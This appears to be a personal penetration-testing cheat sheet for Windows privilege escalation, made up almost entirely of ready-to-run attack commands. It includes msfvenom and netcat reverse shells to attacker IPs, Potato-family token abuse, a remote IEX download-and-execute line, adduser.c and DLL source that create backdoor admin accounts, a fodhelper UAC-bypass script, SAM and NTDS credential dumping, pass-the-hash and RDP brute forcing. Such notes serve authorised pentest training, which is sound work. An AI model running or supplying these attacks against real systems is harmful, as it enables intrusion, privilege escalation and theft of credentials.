Windows PrivEsc Exploitation
Links
- Run As Blog
- GodPotato
- PrintSpoofer
- Unquoted Service Path
- Payload All The Things Win Priv
- UAC Bypass Info
- WADComs
- LOLBAS
Turn off Powershell Script Restrictions
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted
Quick Wins
whoami /priv # Printspoofer
whoami /groups # UAC Bypass
findstr /si password *.txt *.ini *.config # passwords # BREAKS THE SHELL A LOT # AVOID
# Powershell history passwords
type C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# Is value 1? If yes, AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
icacls "test.exe" # Insecure file permission
Get-Acl C:\xampp\htdocs\logs | fl # Same as icacls but better
wsl whoami # Windows subsystem
cmdkey /list # Stored creds so do Runas
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Autologon creds
# unquoted
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\"
wmic service list brief | findstr "Running" # Scheduled tasks
netstat -ano # Chisel?
# Low-level findings
Look in temp, Look in system 32 for SAM and SYSTEM, Look for ssh keys
Look at PowerShell history and appcmd.exe on winpeas
Accesschk.exe
> accesschk.exe /accepteula -flag [FLAG]
# -u: suppress errors | -q: quiet; no banner | -v: verbose
# -w: write access objects only
# -c: windows service <>
# -d: directory <>
# -k: registry key <>
icacls
> icacls [FILE|DIR] [FLAG]
# /T - traverse all dir and files within the folder
# /grant USER:PERM
# /setowner USER
or copy permissions from another file or folder:
Get-Acl -Path C:\Folder1 | Set-Acl -Path C:\Folder2
Service Cmds
# configuration of service
> sc.exe qc SERVICE
# status of service
> sc.exe query SERVICE
# modify config
> sc.exe config SERVICE <key>= <value>
# start / stop / restart
> net [start/stop] SERVICE
> sc [start/stop] SERVICE
PS> Restart-Service -Name SERVICE
# is exe running with admin?
> tasklist /V | findstr FILE.exe
Password Loot
findstr /si password *.txt *.ini *.config # Password in text files
cmdkey /list
type C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt # password
# All 3 are golden Powershell
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\<steve>\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
WE CAN ALWAYS SWITCH TO OTHER USER WITH RUNAS COMMAND like and put the password that we found
runas /user:backupadmin cmd # backupadmin is the user here
runas /savecred /user:admin cmd # We can try getting reverse shell install cmd
# Password in registry keys
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Look for desktop.ini on desktop of all users, you may find password sometimes CTFish
Look for unattended.xml files
Look at PowerShell history and appcmd.exe on winpeas
Run As
Runas which allows us to run a program as a different user. Runas can be used with local or domain accounts as long as the user has the ability to log on to the system.
cmdkey /list # List stored Creds on the machine
where runas.exe # If we find or have the password
# Example Stores Creds:
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
# Transfer msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
# Using the above Stored Creds:
runas /savecred /user:<USER found from cmdkey command above> "shell.exe"
# Change path below
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
# If the above doesn't work
runas /user:administrator cmd # Try this or below to get the reverse shell
runas /user:administrator "nc.exe -e cmd.exe <IP> 443"
# If the above doesn't work, try RunasCs
RunAsCs
https://github.com/antonioCoco/RunasCs/tree/master
Import-Module .\Invoke-RunasCs.ps1
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "shell.exe"
or use to reverse shell:
.\r.exe C.Bum Tikkycoll_431012284 -r 10.10.14.6:443 cmd
SeImpersonatePrivilege
# Detect
whoami /priv # See for SeImpersonatePrivilege to be enabled
If not, you might be able to use FullPowers to get this, like on the vulnlab media box:
https://seriotonctf.github.io/2023/10/19/Media-Vulnlab/
https://github.com/itm4n/FullPowers/releases/tag/v0.1
1. ./FullPowers.exe -c "C:\temp\nc64.exe 10.8.0.210 443 -e cmd" -z
2. Catch the shell
3. Use GodPotato or another to catch another shell w/ priv esc done.
4. .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.0.210 443"
## PrintSpoofer
https://github.com/itm4n/PrintSpoofer
# Attack, Transfer the PrintSpoofer64.exe
PrintSpoofer.exe -i -c cmd
.\PrintSpoofer32.exe -c "nc.exe 192.168.45.152 443 -e cmd"
##God Potato
https://github.com/BeichenDream/GodPotato
# If PrintSpoofer Doesn’t work then Try GodPotato - It’s the latest
.\GodPotato-NET35.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.152 443"
GodPotato-NET2.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.152 443"
GodPotato-NET4.exe -cmd "c:\wamp\www\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.152 443"
## JuicyPotato
https://github.com/ohpe/juicy-potato
Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c C:\wamp\www\nc.exe -e cmd.exe 192.168.45.152 443" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c C:\wamp\www\nc.exe -e cmd.exe 192.168.45.152 443" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
## Lovely Potato
https://github.com/TsukiCTF/Lovely-Potato
Quick Guide
First clone this repo to your attacker machine which already has all of required dependencies:
root@attacker:~# git clone https://github.com/TsukiCTF/Lovely-Potato.git
root@attacker:~# cd Lovely-Potato
Then modify the two following variables in 'Invoke-LovelyPotato.ps1' as below (attacker machine IP, writable path on the victim machine):
$RemoteDir = "http://[AttackerIP]
$LocalPath = "[WritablePathOnVictimMachine]"
Now create a meterpreter binary on the attacker machine or use any other executable reverse shell:
root@attacker:~/Lovely-Potato# msfvenom -p windows/meterpreter/reverse_tcp LHOST=[AttackerIP] LPORT=[AttackerPort] -f exe -o meterpreter.exe
Start a web server in this repo to serve your meterpreter.exe and other dependencies:
root@attacker:~/Lovely-Potato# python3 -m http.server 80
On a new terminal, launch metasploit console (or any listener which handles whatever you are serving as a reverse shell):
root@attacker:~# msfdb run
msf5 > # I'm going to omit setting up the multi handler as it is something you should already know
Finally enter below command on victim's powershell console and you MUST WAIT 10 minutes for reverse shell running as user NT AUTHORITY\SYSTEM!
PS > IEX(New-Object Net.WebClient).DownloadString('http://[AttackerIP]/Invoke-LovelyPotato.ps1')
## RoguePotato
https://github.com/antonioCoco/RoguePotato
.\RoguePotato.exe -r 192.168.1.11 –l 9999 -e "C:\Windows\Temp\rev.exe
## JuicyPotatoNG.exe
https://github.com/antonioCoco/JuicyPotatoNG
JuicyPotatoNG.exe -t * -p "nc64.exe" -a "-e cmd.exe 10.8.1.213 80"
Generic Potato from Cereal HTB
Generic Potato Cereal HTB Generic Potato Generic Potato Potato Blog
# A modified version of SweetPotato by @EthicalChaos to support impersonating authentication over HTTP and/or named pipes. This allows for local privilege escalation from SSRF and/or file writes.
.\GenericPotato.exe -p "c:\Users\sonny\Desktop\nc64.exe" -a "10.10.14.7 443 -e powershell" -e HTTP -l 8889
rlwarp nc -nvlp 443
curl -k -X "POST" -H "Content-Type: application/json" --data-binary '{"query":"mutation{updatePlant(plantId:2, version:2.2, sourceURL:\"[http://localhost:8889\](http://localhost:8889/)")}"}' '[http://localhost:8081/api/graphql'](http://localhost:8081/api/graphql')
SeManageVolumeExploit
* Do this if you see SEChangeNotifyPrivilege 'Bypass traverse checking' enabled*
Full Control over C:\
https://github.com/xct/SeManageVolumeAbuse
https://github.com/CsEnox/SeManageVolumeExploit
For example:
certutil -urlcache -split -f http://192.168.45.173:9090/SeManageVolumeExploit.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=135 -f dll -o tzres.dll
copy here: C:\windows\system32\wbem
certutil -urlcache -split -f http://192.168.45.173:9090/tzres.dll
Then run:
systeminfo
Siren Notes on SeManageVolumeExploit
.bashrc
alias dllref='clear ; cat $HOME/ref/dllref'
This is potentially an incomplete list.
dllref (flat file):
=================================================================================
C:\Windows\System32\wpcoreutil.dll (Windows Insider service `wisvc` triggerd by Clicking Start Windows Insider Program)
=================================================================================
C:\Windows\System32\phoneinfo.dll (Windows Problem Reporting service)
https://twitter.com/404death/status/1262670619067334656 (without reboot by @jonasLyk)
=================================================================================
#dxgi - Trigger is check for protection update
C:\Windows\System32\wbem\dxgi.dll (windows security -> check for protection update)
=================================================================================
#tzres.dll
C:\Windows\System32\wbem\tzres.dll (systeminfo, NetworkService)
=================================================================================
### Need to reboot to get NT AUTHORITY\SYSTEM (hijack dll) ###
C:\Windows\System32\wlbsctrl.dll (IKEEXT service)
C:\Windows\System32\wbem\wbemcomn.dll (IP Helper)
=================================================================================
C:\Windows\System32\ualapi.dll (spooler service)
http://www.hexacorn.com/blog/2016/11/08/beyond-good-ol-run-key-part-50/
=================================================================================
C:\Windows\System32\fveapi.dll (ShellHWDetection Service) @bohops
=================================================================================
C:\Windows\System32\Wow64Log.dll (this dll loaded by other third party services such as GoogleUpdate.exe)
http://waleedassar.blogspot.com/2013/01/wow64logdll.html
=================================================================================
#DLL
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.190 LPORT=4444 -f dll -o Printconfig.dll
#Overwrite:
C:\Windows\System32\spool\drivers\x64\3\
#Trigger
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)
=================================================================================
#ALL ABOVE REQUIRE ADMIN READ/WRITE
https://github.com/CsEnox/SeManageVolumeExploit/
SeManageVolumeExploit.exe
=================================================================================
SeBackupPrivilege
# Import libraries
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Get-SeBackupPrivilege # ...or whoami /priv | findstr Backup SeBackupPrivilege is disabled
# Enable SeBackupPrivilege
Set-SeBackupPrivilege
Get-SeBackupPrivilege
# List Admin folder for example and steal a file
dir C:\enterpriseadmin\desktop\
Copy-FileSeBackupPrivilege C:\Users\enterpriseadmin\desktop\\flag.txt c:\users\enterpriseuser\flag.txt -Overwrite
Do this to get the Admin Hash with this:
https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/
nano raj.dsh
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
unix2dos raj.dsh
cd C:\Temp
upload raj.dsh
diskshadow /s raj.dsh
robocopy /b z:\windows\ntds . ntds.dit
reg save hklm\system c:\Temp\system
cd C:\Temp
download ntds.dit
download system
impacket-secretsdump -ntds ntds.dit -system system local
For the hash, use the last one after the ":"
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
evil-winrm -i 192.168.1.172 -u administrator -H "##Hash##"
evil-winrm -i 192.168.1.172 -u administrator -H "ee4457ae59f1e3fbd764e33d9cef123d"
Unquoted Service Path
-> If there is space between the path and it is not enclosed in double quotes then we can exploit it.
Example:
C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
-> How system tries to execute an Unquoted service path
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My service\service.exe
Detection
# PowerView
Import-Module ./PowerView.ps1
Invoke-AllChecks OR Get-UnquotedService
OR
wmic service get displayname,pathname
OR
# Best one
Get-CimInstance -ClassName win32_service | Select Name,State,PathName # Powershell
OR
# Best one
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\"
Found the anomaly unquoted service path? # Services with no quotes & spaces in path
Write Path and Service name in notes first # Service name can be found in winpeas, Powerview
icacls <Path of the file>
Example: C:\Program Files\yolo Apps\Current Version\yolo.exe
# TRY IN THIS FASHION ONLY
-> icacls C:\Program Files, icacls C:\Program Files\yolo Apps, and vice versa.
-> Once we see W or anything on the folder, pick up the next file and put binary
WE WANT W on BUILTIN/USERS or AUTHENTICATED USERS or USERNAME access
# Example
C:\Program Files\yolo Apps\Current Version\yolo.exe
icacls C:\Program Files\yolo Apps # Gives W on Users
Put malicious Current.exe in the yolo folder
Exploitation
1) msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<> -f exe -o Common.exe
OR
2) addduser.c from shells module
OR
3) msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe2.
Victim machine:
1. Place common.exe in 'C:\Program Files\<Unquoted Path Service>'
# directly transfer it to place OR using move below
# move "C:\users\ted\zen.exe" "C:\program files\zen\zen.exe"
2. sc start <service_name> or Start-Service <service_name> # Powershell
# Just try putting malicious binary, we don't know if it's running every second auto
# If the above doesn't work we need to restart, refer service binary module above
3. net localgroup administrators # To check if the user was added or nc to listen
Scheduled Tasks
Detection
# Generally backup files otherwise lots of noise
schtasks /query /fo LIST /v
# Look in Author, TaskName, Task To Run, Run As User, and Next Run Time fields.
OR
# PowerShell
Get-ScheduledTask | ft TaskName,TaskPath,State
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Exploitation
1) icacls <file.exe> # Do we have M or F on BUILTIN/USERS or Username?
2) Replace the file directly with adduser.exe or msfvenom shell
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<> -f exe -o Common.exe
AlwaysInstallElevated
# If the value for both is 1, then it's exploitable
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
# Generate a malicious .msi and transfer to victim
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi -o evil.msi
# Put the file in C:\Windows\Temp
msiexec /quiet /qn /i C:\Windows\Temp\evil.msi
# or try
evil.msi
# If doesn't work
-> Try a Different port like 21
-> Try Different Arch like x86 and x64
-> Try putting the file in tmp or the user's desktop
Insecure File permission
Powershell
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
icacls "C:\Program Files\test\bin\test.exe" # Path of the service\
Get-Acl C:\xampp\htdocs\logs | fl # Same as icacls but better
Check to see if this application has BUILTIN\USERS permission. If yes, Boom - Jackpot!
# Get msfvenom and replace that file with the move command
# Craft the Attack, ON KALI
adduser.c
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user evil password123 /add");
i = system ("net localgroup administrators evil /add");
return 0;
}
# Compile the code and transfer the binary to the Victim.
i686-w64-mingw32-gcc adduser.c -o adduser.exe
# Replace the service with our malicious binary on Victim.
move "C:\Program Files\test\bin\test.exe" "C:\Program Files\test\bin\test.exe"
move adduser.exe "C:\Program Files\test\bin\test.exe"
dir "C:\Program Files\test\bin\"
# Restart the service
wmic service where caption='test' get name, caption, state, startmode
shutdown /r /t 0
net localgroup Administrators
Another Example of Binary and DLL Hijacking
Service Binary HiJacking
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
icacls "C:\xampp\apache\bin\httpd.exe"
icacls "C:\xampp\mysql\bin\mysqld.exe"
//adduser.c
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user dave2 password123! /add");
i = system ("net localgroup administrators dave2 /add");
return 0;
}
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
iwr -uri http://192.168.45.225/adduser.exe -Outfile adduser.exe
move C:\xampp\mysql\bin\mysqld.exe mysqld.exe
move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe
net stop mysql
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
whoami /priv
shutdown /r /t 0
Get-LocalGroupMember administrators
cp /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 .
python3 -m http.server 80
iwr -uri http://192.168.45.225/PowerUp.ps1 -Outfile PowerUp.ps1
powershell -ep bypass
. .\PowerUp.ps1
Get-ModifiableServiceFile
Install-ServiceBinary -Name 'mysql'
$ACL = Get-Acl -Path "Folder1"
$User = New-Object System.Security.Principal.Ntaccount("TestUser1")
$ACL.SetOwner($User)
$ACL | Set-Acl -Path "Folder1"
Get-ACL -Path "Folder1"
## Service DLL Hijacking
---
1. The directory from which the application loaded.
2. The system directory.
3. The 16-bit system directory.
4. The Windows directory.
5. The current directory.
6. The directories that are listed in the PATH environment variable.
Listing 56 - Standard DLL search order on current Windows versions
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
icacls .\Documents\BetaServ.exe
Load Process Monitor to filter for service
Restart-Service BetaService
$env:path
---
#include <stdlib.h>
#include <windows.h>
BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
int i;
i = system ("net user dave2 password123! /add");
i = system ("net localgroup administrators dave2 /add");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}
Listing 62 - C++ DLL example code from Microsoft
x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll
cd Documents
iwr -uri http://192.168.45.225/myDLL.dll -Outfile myDLL.dll
net user
Restart-Service BetaService
net user
net localgroup administrators
Gain Access DLL Hijacking
https://github.com/ptoomey3/evilarc/tree/master
This was from Bruno Vulnlab:
https://arz101.medium.com/vulnlab-bruno-f0129f60ac40
Basically just zip up a dll to a specific folder you have access to.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.154 LPORT=2222 -f dll > test.dll
python evilarc.py -d 1 -p app Microsoft.DiaSymReader.Native.amd64.dll
Windows Subsystem
wsl whoami
wsl python -c <'BIND_OR_REVERSE_SHELL_PYTHON_CODE>
UAC Bypass
User Account Control - The effect of UAC is that any application that wishes to perform an operation with a potential system-wide impact, cannot do so silently. This one is UAC Bypass - Fodhelper.exe.
# Check which level - if medium level integrity shell
whoami /groups
where fodhelper.exe # Find the location of fodhelper.exe on the system
Exploitation
# This can directly give high-level integrity sometimes, one-time wonder. if works, works.
powershell.exe Start-Process cmd.exe -Verb runAs
Fodhelper.exe Bypass
# To see if UAC is enabled
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
# To see which level is configured
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
# Check for Medium Mandatory Level
whoami /groups | findstr Level
# Search for fodhelper.exe always
where /r C:\\windows fodhelper.exe
# Run this to check Powershell x86 or x64
powershell [Environment]::Is64BitProcess
# If False
C:\Windows\sysnative\cmd.exe
# Just Type these commands
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
# The operation was completed successfully. # YES
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
# Generate shell64.exe with msfvenom [see if it's 64bit process]
SHELL NAME SHOULD BE THE FODHELPER.exe or whatever .exe is running.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f exe > <shell-x64.exe>
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\Users\viewer\Desktop\fodhelper.exe" /f
# Execute Folhelper.exe again (Try each of those if one doesn't work)
# CHANGE NOTHING HERE, just the path try
C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\fodhelper.exe -WindowStyle Hidden"
cmd.exe /c "powershell Start-Process C:\Windows\System32\fodhelper.exe -WindowStyle Hidden"
C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\SysWOW64\fodhelper.exe -WindowStyle Hidden"
cmd.exe /c "powershell Start-Process C:\Windows\SysWOW64\fodhelper.exe -WindowStyle Hidden"
Notes from local machine
Used this script, seems to work:
function FodhelperUACBypass(){
Param (
#[String]$program = "cmd /c start C:\Windows\System32\cmd.exe" #default
#[String]$program = "cmd.exe /c net user test456 Password456! /add"
[String]$program = "cmd.exe /c net localgroup administrators test456 /add"
)
#Create Registry Structure
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
#Start fodhelper.exe
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
#Cleanup
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
}
.ODT - Htdocs
Autoron
upnuphost
Other Notes I had
nc 192.168.236.222 4444
whoami /priv
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
python3 -m http.server 80
powershell
iwr -uri http://192.168.45.234/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe
.\PrintSpoofer64.exe -i -c powershell.exe
whoami
---
more note20.txt
Alex's password expired, but he's on holiday for the next 4 weeks. Password reset by IT to the default
more note2.txt
Default password for new resets will be WelcomeToWinter0121
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.234 LPORT=4444 -f dll > EnterpriseServiceOptional.dll
privesc tools
check if win-logon-creds are working
msf
use exploit/windows/smb/psexecset PAYLOAD windows/x64/meterpreter/reverse_tcpSHOW TARGETS>set TARGET X
use exploit/windows/smb/psexec_psh
Note: psexec & evil-winrm uses port 5985 (powershell remote access)
psexec | smbexec | wmiexec
NOTE: psexec, smbexec will give SYSTEM shell. wmiexec will give user shell.
impacket-psexec DOMAIN/USER:['PASS']@IP [-hashes :NTLMHASH]
impacket-smbexec DOMAIN/USER:['PASS']@IP [-hashes :NTLMHASH]
impacket-wmiexec DOMAIN/USER:['PASS']@IP [-hashes :NTLMHASH]
evil-winrm
**NOTE:** evil-winrm usually gives **medium integrity shells** for added administrator accounts. Even if new account has Administrator permissions, cannot actually perform administrative actions with it.
# only USER, no DOMAIN needed
evil-winrm -i IP -u USER [-H NT-HASH | -p PASS]
# custom options
PS> menu
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
winexe
winexe -U 'DOMAIN/USER%PASS' //IP cmd.exe
pth-winexe
pth-winexe -U 'DOMAIN/USER%HASH' //IP cmd.exe
# --system needs local admin hash
pth-winexe [--system] -U 'administrator%NTLM:HASH' //IP cmd.exe
PsExec.exe
PS> .\PsExec64.exe -accepteula -i -s SHELL.exe
# i: Run process interactively
# s: Run remote process in the System account.
> PSExec64.exe -i -u "nt authority\local service" SHELL.exe
# u: Run process as user-account <>
# Run executable with a different user:pass
PS> .\PsExec.exe -accepteula -u USER -p PASS nc.exe IP PORT -e cmd.exe
Dump SAM
SAM Hash Format
uid : rid : LM_Hash : NTLM_Hash
Empire Project
powershell.exe -exec bypass -Command "& {Import-Module .\Invoke-PowerDump.ps1; Invoke-PowerDump}"
Manual
https://www.thehacker.recipes/a-d/movement/credentials/dumping/sam-and-lsa-secrets
# actual location
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SECURITY
C:\Windows\System32\config\SYSTEM
# other locations
C:\Windows\System32\config\RegBack
C:\Windows\Repair
reg save hklm\sam c:\Users\Public\ksam
reg save hklm\system c:\Users\Public\ksystem
reg save hklm\security c:\Users\Public\ksecurity
# on kali
samdump2 ksystem ksam
impacket-secrectsdump -sam ksam -security ksecurity -system ksystem LOCAL
# Remote dumping of SAM & LSA secrets
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'
# Remote dumping of SAM & LSA secrets (pass-the-hash)
secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
# Remote dumping of SAM & LSA secrets (pass-the-ticket)
secretsdump.py -k 'DOMAIN/USER@TARGET'
# Offline dumping of LSA secrets from exported hives
secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
# Offline dumping of SAM secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL
# Offline dumping of SAM & LSA secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
Putty
If installed, might find creds
1) reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there
or try this:
2) . .\SessionGopher.ps1
1) Invoke-SessionGopher -Thorough
RDP Bruteforce
https://github.com/galkan/crowbar
You can use hydra, but this will probably work as well:
# ./crowbar.py -b rdp -s 192.168.2.250/32 -u localuser -C ~/Desktop/passlist